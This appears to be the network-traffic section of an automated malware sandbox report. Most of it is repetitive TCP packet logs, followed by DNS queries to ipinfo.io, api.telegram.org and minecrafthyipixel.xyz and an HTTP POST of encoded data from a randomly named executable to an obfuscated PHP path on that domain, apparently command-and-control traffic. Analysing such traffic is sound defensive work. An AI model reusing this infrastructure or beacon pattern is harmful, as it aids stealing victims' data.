                                                                                                                                    Apr 19, 2024 13:44:25.925026894 CEST8049930104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:25.927653074 CEST4993080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:26.032043934 CEST8049930104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:26.185456991 CEST8049930104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:26.185483932 CEST8049930104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:26.185576916 CEST4993080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:26.297555923 CEST4993080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:26.297909021 CEST4993180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:26.402323008 CEST8049931104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:26.402348995 CEST8049930104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:26.407392979 CEST4993180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:26.407394886 CEST4993080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:26.407507896 CEST4993180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:26.511923075 CEST8049931104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:26.511984110 CEST8049931104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:26.512141943 CEST4993180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:26.617090940 CEST8049931104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:26.857815027 CEST8049931104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:26.857877016 CEST8049931104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:26.857937098 CEST4993180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:26.969854116 CEST4993180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:26.970705032 CEST4993280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:27.074909925 CEST8049931104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:27.074974060 CEST8049932104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:27.074980021 CEST4993180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:27.075037956 CEST4993280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:27.075130939 CEST4993280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:27.179403067 CEST8049932104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:27.180314064 CEST8049932104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:27.180527925 CEST4993280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:27.285207033 CEST8049932104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:27.551052094 CEST8049932104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:27.551115990 CEST8049932104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:27.553685904 CEST4993280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:27.674159050 CEST4993280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:27.674257040 CEST4993380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:27.778549910 CEST8049933104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:27.779866934 CEST8049932104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:27.781961918 CEST4993380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:27.781970024 CEST4993280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:27.781963110 CEST4993380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:27.886409998 CEST8049933104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:27.886681080 CEST8049933104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:27.887708902 CEST4993380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:27.992247105 CEST8049933104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:28.146203041 CEST8049933104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:28.146265984 CEST8049933104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:28.146512985 CEST4993380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:28.269105911 CEST4993380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:28.269236088 CEST4993480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:28.373558044 CEST8049934104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:28.373723030 CEST8049933104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:28.373924017 CEST4993380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:28.373927116 CEST4993480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:28.373927116 CEST4993480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:28.478410006 CEST8049934104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:28.478468895 CEST8049934104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:28.490915060 CEST4993480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:28.595196009 CEST8049934104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:28.748598099 CEST8049934104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:28.748665094 CEST8049934104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:28.748821020 CEST4993480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:29.036053896 CEST4993480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:29.036281109 CEST4993580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:29.140650988 CEST8049935104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:29.140883923 CEST4993580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:29.140885115 CEST4993580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:29.141341925 CEST8049934104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:29.141539097 CEST4993480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:29.245388031 CEST8049935104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:29.246015072 CEST8049935104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:29.246387959 CEST4993580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:29.273794889 CEST4993680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:29.273794889 CEST4993580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:29.351022005 CEST8049935104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:29.378945112 CEST8049936104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:29.379005909 CEST8049935104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:29.379199028 CEST4993680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:29.379199028 CEST4993580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:30.323599100 CEST4993680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:30.391119957 CEST4993780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:30.428186893 CEST8049936104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:30.430380106 CEST8049936104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:30.430531979 CEST4993680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:30.495309114 CEST8049937104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:30.495500088 CEST4993780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:30.495500088 CEST4993780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:30.534910917 CEST8049936104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:30.599881887 CEST8049937104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:30.600650072 CEST8049937104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:30.600943089 CEST4993780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:30.705400944 CEST8049937104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:30.797111034 CEST8049936104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:30.797194958 CEST8049936104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:30.797393084 CEST4993680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:30.868021011 CEST8049937104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:30.868082047 CEST8049937104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:30.868221998 CEST4993780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:30.998034954 CEST4993680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:30.998197079 CEST4993780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:30.998795033 CEST4993880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:31.103379011 CEST8049938104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:31.103445053 CEST8049937104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:31.103480101 CEST8049936104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:31.103503942 CEST4993780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:31.103553057 CEST4993680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:31.103563070 CEST4993880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:31.103835106 CEST4993880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:31.208432913 CEST8049938104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:31.208529949 CEST8049938104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:31.208756924 CEST4993880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:31.313410044 CEST8049938104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:31.475678921 CEST8049938104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:31.475744009 CEST8049938104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:31.475992918 CEST4993880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:31.594959974 CEST4993880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:31.598262072 CEST4993980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:31.699965954 CEST8049938104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:31.701164961 CEST4993880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:31.702641964 CEST8049939104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:31.702722073 CEST4993980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:31.702852964 CEST4993980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:31.807321072 CEST8049939104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:31.807384968 CEST8049939104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:31.807733059 CEST4993980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:31.912334919 CEST8049939104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:32.171611071 CEST8049939104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:32.171679974 CEST8049939104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:32.171845913 CEST4993980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:32.284002066 CEST4994080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:32.388483047 CEST8049940104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:32.388577938 CEST4994080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:32.388678074 CEST4994080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:32.493880033 CEST8049940104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:32.494462967 CEST8049940104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:32.494594097 CEST4994080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:32.599114895 CEST8049940104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:32.764496088 CEST8049940104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:32.764554977 CEST8049940104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:32.764619112 CEST4994080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:32.878994942 CEST4994080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:32.879369974 CEST4994180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:32.984245062 CEST8049941104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:32.984313965 CEST4994180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:32.984328032 CEST8049940104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:32.984417915 CEST4994180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:32.984431028 CEST4994080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:33.088845968 CEST8049941104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:33.089418888 CEST8049941104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:33.089554071 CEST4994180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:33.194214106 CEST8049941104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:33.461630106 CEST8049941104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:33.461688042 CEST8049941104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:33.462505102 CEST4994180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:33.579329967 CEST4994180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:33.581836939 CEST4994280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:33.685003996 CEST8049941104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:33.685128927 CEST4994180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:33.686346054 CEST8049942104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:33.686506987 CEST4994280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:33.686579943 CEST4994280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:33.792313099 CEST8049942104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:33.792372942 CEST8049942104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:33.792742014 CEST4994280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:33.898507118 CEST8049942104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:34.140918016 CEST8049942104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:34.140981913 CEST8049942104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:34.141221046 CEST4994280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:34.251939058 CEST4994280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:34.253186941 CEST4994380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:34.356328011 CEST8049942104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:34.356408119 CEST4994280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:34.357443094 CEST8049943104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:34.357717991 CEST4994380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:34.357920885 CEST4994380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:34.462136984 CEST8049943104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:34.462258101 CEST8049943104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:34.462428093 CEST4994380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:34.567075968 CEST8049943104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:34.735208035 CEST8049943104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:34.735271931 CEST8049943104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:34.735341072 CEST4994380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:34.866508961 CEST4994380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:34.867221117 CEST4994480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:34.972696066 CEST8049944104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:34.972914934 CEST4994480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:34.972974062 CEST8049943104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:34.973005056 CEST4994480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:34.973033905 CEST4994380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:35.077127934 CEST8049944104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:35.077496052 CEST8049944104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:35.077708960 CEST4994480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:35.182080984 CEST8049944104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:35.337918043 CEST8049944104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:35.337981939 CEST8049944104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:35.338152885 CEST4994480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:35.455831051 CEST4994580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:35.455945015 CEST4994480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:35.560725927 CEST8049944104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:35.560791969 CEST8049945104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:35.561722994 CEST4994580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:35.561765909 CEST4994480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:35.561846972 CEST4994580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:35.667587996 CEST8049945104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:35.667648077 CEST8049945104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:35.667917013 CEST4994580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:35.772780895 CEST8049945104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:35.807529926 CEST4994580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:35.807645082 CEST4994680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:35.912115097 CEST8049946104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:35.913228989 CEST8049945104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:35.915709972 CEST4994580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:35.915832996 CEST4994680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:35.915833950 CEST4994680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:35.959553957 CEST4994780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:36.020298958 CEST8049946104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:36.020354986 CEST8049946104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:36.023571014 CEST4994680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:36.063993931 CEST8049947104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:36.064538002 CEST4994780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:36.064654112 CEST4994780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:36.128272057 CEST8049946104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:36.169680119 CEST8049947104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:36.170178890 CEST8049947104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:36.175318003 CEST4994780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:36.280410051 CEST8049947104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:36.386240005 CEST8049946104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:36.386298895 CEST8049946104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:36.388423920 CEST4994680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:36.438750982 CEST8049947104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:36.438810110 CEST8049947104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:36.439054012 CEST4994780192.168.2.4104.21.57.61

                                                                                                                                    UDP Packets

                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Apr 19, 2024 13:41:58.279858112 CEST5011753192.168.2.41.1.1.1
                                                                                                                                    Apr 19, 2024 13:41:58.384975910 CEST53501171.1.1.1192.168.2.4
                                                                                                                                    Apr 19, 2024 13:41:59.491413116 CEST6442753192.168.2.41.1.1.1
                                                                                                                                    Apr 19, 2024 13:41:59.596930981 CEST53644271.1.1.1192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:32.970161915 CEST6032153192.168.2.41.1.1.1
                                                                                                                                    Apr 19, 2024 13:42:33.112523079 CEST53603211.1.1.1192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.181332111 CEST5624553192.168.2.41.1.1.1
                                                                                                                                    Apr 19, 2024 13:42:37.286865950 CEST53562451.1.1.1192.168.2.4

                                                                                                                                    DNS Queries

                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                    Apr 19, 2024 13:41:58.279858112 CEST192.168.2.41.1.1.10x1fdbStandard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                                                    Apr 19, 2024 13:41:59.491413116 CEST192.168.2.41.1.1.10xbd82Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                    Apr 19, 2024 13:42:32.970161915 CEST192.168.2.41.1.1.10x6799Standard query (0)minecrafthyipixel.xyzA (IP address)IN (0x0001)false
                                                                                                                                    Apr 19, 2024 13:42:37.181332111 CEST192.168.2.41.1.1.10xf5e8Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false

                                                                                                                                    DNS Answers

                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                    Apr 19, 2024 13:41:58.384975910 CEST1.1.1.1192.168.2.40x1fdbNo error (0)ipinfo.io34.117.186.192A (IP address)IN (0x0001)false
                                                                                                                                    Apr 19, 2024 13:41:59.596930981 CEST1.1.1.1192.168.2.40xbd82No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                    Apr 19, 2024 13:42:33.112523079 CEST1.1.1.1192.168.2.40x6799No error (0)minecrafthyipixel.xyz104.21.57.61A (IP address)IN (0x0001)false
                                                                                                                                    Apr 19, 2024 13:42:33.112523079 CEST1.1.1.1192.168.2.40x6799No error (0)minecrafthyipixel.xyz172.67.189.92A (IP address)IN (0x0001)false
                                                                                                                                    Apr 19, 2024 13:42:37.286865950 CEST1.1.1.1192.168.2.40xf5e8No error (0)ipinfo.io34.117.186.192A (IP address)IN (0x0001)false

                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                    • ipinfo.io
                                                                                                                                    • api.telegram.org
                                                                                                                                    • minecrafthyipixel.xyz

                                                                                                                                    HTTP Packets

                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    0192.168.2.449739104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:33.224119902 CEST385OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 344
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:33.328784943 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:33.329711914 CEST344OUTData Raw: 05 05 01 02 06 01 01 01 05 06 02 01 02 0d 01 0b 00 07 05 08 02 02 03 0c 02 0f 0f 53 04 05 03 08 0a 00 07 59 02 04 04 05 0f 06 05 00 04 07 05 0f 03 0a 0f 08 0f 0e 04 51 01 02 05 0d 07 0b 06 0b 05 03 0c 00 07 51 04 03 0f 07 0c 52 0d 00 0d 04 05 02
                                                                                                                                    Data Ascii: SYQQRW\L}P|py[`\aBvvkRk|aw|h|s|oU{{sa[kSRCc^o]}u~V@z}fA~\a
                                                                                                                                    Apr 19, 2024 13:42:33.711438894 CEST1289INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:33 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vlPPjqsv422yecAhGT4XeJTXtNvXwwIR0V2gxRa1ULqGEvSNvo4r1CdYF6FfrAWLTIWV2xLkFHWeU9j9aTtxLrIC1GQd2rsg5VLK3VVGlzzb%2FGUSz9DSTzhH%2FwNdV5zruzweNwm8rz0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1c1fadaada0-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
